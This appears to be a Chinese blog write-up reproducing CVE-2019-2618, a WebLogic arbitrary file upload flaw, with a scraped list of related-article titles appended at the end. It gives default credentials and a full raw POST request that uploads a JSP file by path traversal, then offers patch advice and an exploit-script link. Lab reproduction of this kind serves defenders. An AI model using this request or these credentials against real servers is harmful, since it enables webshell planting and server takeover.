1.漏洞介绍

CVE-2019-2618漏洞主要是利用了WebLogic组件中的DeploymentService接口,该接口支持向服务器上传任意文件。攻击者突破了OAM(Oracle Access Management)认证,设置wl_request_type参数为app_upload,构造文件上传格式的POST请求包,上传jsp木马文件,进而可以获得整个服务器的权限。

2.影响版本

WebLogic 10.3.6.0、12.1.3.0、12.2.1.3

3.漏洞复现

3.1漏洞环境

使用Vulhub里面的CVE-2017-10271环境作为漏洞环境

root@kali:~/vulhub/weblogic/CVE-2017-10271# ls1.png  docker-compose.yml  README.md  set_mirror.sh

root@kali:~/vulhub/weblogic/CVE-2017-10271# docker-compose up -d

访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动

3.2漏洞利用

需要获取weblogic的登陆权限

可尝试以下默认口令

weblogic/weblogic

weblogic/Oracle@123

POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1Host: 192.168.64.161:7001Connection: closeAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.21.0username: weblogicwl_request_type: app_uploadcache-control: no-cachewl_upload_application_name: /../tmp/_WL_internal/bea_wls_internal/9j4dqk/warserverName: testpassword: Oracle@123content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gWarchive: trueserver_version: 10.3.6.0wl_upload_delta: trueContent-Length: 1081------WebKitFormBoundary7MA4YWxkTrZu0gWContent-Disposition: form-data; name="img"; filename="test.jsp"Content-Type: false        out.print("123456");%>------WebKitFormBoundary7MA4YWxkTrZu0gW--

4.修复建议

1、加强密码口令

2、Oracle官方已经在关键补丁更新(CPU)中修复了该漏洞

链接:

https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html

5.工具利用

大佬脚本

https://github.com/jas502n/cve-2019-2618

weblogic 文件打开数_WebLogic任意文件上传漏洞(CVE20192618)复现相关推荐

  1. weblogic 文件打开数_Weblogic任意文件读取和任意文件上传

    引言 weblogic中两个CVE漏洞比较有意思,所以复现一下,该两个漏洞需要在poc中加入用户名和密码(cookie)才能实现. 环境搭建 环境搭建: 首先安装weblogic 下载地址 http: ...

  2. UCMS文件上传漏洞(CVE-2020-25483)复现

    简介 UCMS是一套使用PHP语言编写的内容管理系统. 漏洞概述 UCMS v1.4.8版本存在安全漏洞,该漏洞源于文件写的fopen()函数存在任意命令执行漏洞,攻击者可利用该漏洞可以通过该漏洞访问 ...

  3. 文件上传漏洞的小总结

    目录 一.原理 二. 高危触发点 三.前端处理 四. 后端处理 五. 上传分类 1. js验证 绕过方法 2. 文件扩展名检测 (1). htaccsee上传漏洞 (2). Apache1.x,2.x ...

  4. weblogic系列漏洞整理————8、WebLogic 两处任意文件上传漏洞动态分析(CVE-2018-2894)

    0x01 前言 CNCERT前几天发公告称发现Oracle公司出品的基于JavaEE结构的中间件WebLogic产品存在一个远程上传漏洞,并得到了厂商的确认,危害程度评分高达9.8分.鉴于厂商已进行了 ...

  5. vc++ 6.0 创建程序快捷方式的一个例子源码_漏洞复现:phpcms v9.6.0任意文件上传漏洞(CVE201814399)...

    文章说明 漏洞复现是为了学习漏洞利用所写,漏洞都是互联网上以流传已久的各种漏洞的利用及原理,用来增强自己见识,培养自己动手能力,有兴趣的朋友可自行搭建环境练习.源码下载连接在文章最后. 漏洞说明 PH ...

  6. UEditor 任意文件上传漏洞

    1 漏洞简介 1.1 漏洞描述 Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本.其他的php,jsp,asp版本不受此UEditor的 ...

  7. Linux比较大文件内容,Linux系统最大文件打开数优化,解决Too many open files报错

    这是一个Linux系统常见的故障,网络上也能轻易的找到解决办法,我也只是在工作中遇到了这个问题,所以在博客记录下,以备不时之需. 一.报错截图: 图为resin的报错日志,很明显提示了Too many ...

  8. 详细分析 Sonlogger 任意文件上传漏洞 (CVE-2021-27964)

     聚焦源代码安全,网罗国内外最新资讯! 概述 Sonlogger 是土耳其SFC 公司 开发的一款应用软件,兼容土耳其<第5651号法>,是一款基于 Web 的 SonicWall 防火墙 ...

  9. FireEye 红队失窃工具大揭秘之:分析复现 Zoho 任意文件上传漏洞(CVE-2020-8394)

     聚焦源代码安全,网罗国内外最新资讯! 前言 最近,全球领先的网络安全公司 FireEye 疑遭某 APT 组织的攻击,其大量政府客户信息遭越权访问,且红队工具被盗.虽然目前尚不清楚这些红队工具将被如 ...

最新文章

  1. three.ar.js_我们如何通过AR.js使产品吉祥物栩栩如生
  2. java中字节输入流和输出流的简单使用例子
  3. TreeMap源码分析,看了都说好
  4. 关于spring的p标签(转)
  5. Blum Integer的定义及举例
  6. iOS获取ipa素材、提取ipa资源图片文件
  7. php怎么求最小公倍数,C++_详解C语言求两个数的最大公约数及最小公倍数的方法,求两个正整数的最大公约数nbs - phpStudy...
  8. MySQL和Oracle的一些区别
  9. 科学研究:统计来看,是不是新(接触的)人运气明显好?
  10. MSDN下载出现链接格式有误,如何解决
  11. # AD19规则设置的傻瓜式教程
  12. 显示器+测试软件,MonitorTest(显示器性能测试软件
  13. 代码抛出异常后进行事务回滚的两种方式(Spring @Transactional注解)
  14. ROS做端口映射DDNS的N个做法详细教程
  15. python中shape错误_python中shape错误
  16. 启动优化之Android-Startup
  17. 会议录播软件测试自学,如何录制Zoom视频会议?
  18. Python笔记-面向对象
  19. 不可不知的CPU风扇清理技巧
  20. 球球大佬们帮忙分析win10蓝屏dmp!!

热门文章

  1. 消息中间件学习总结(21)——RocketMQ 消息丢失场景分析及如何解决!
  2. Mysql学习总结(29)——MySQL中CHAR和VARCHAR
  3. Linux学习总结(12)——Linux必须学会的60个命令
  4. Java基础学习总结(2)——接口
  5. linux pxe服务器的配置,pxe http安装linux 配置
  6. 克拉克拉(KilaKila):大规模实时计算平台架构实战 1
  7. 阿里巴巴十周年庆(预告)
  8. freeswitch订阅会议相关通知
  9. 关于 HDFS Append
  10. 批量创建Linux用户账号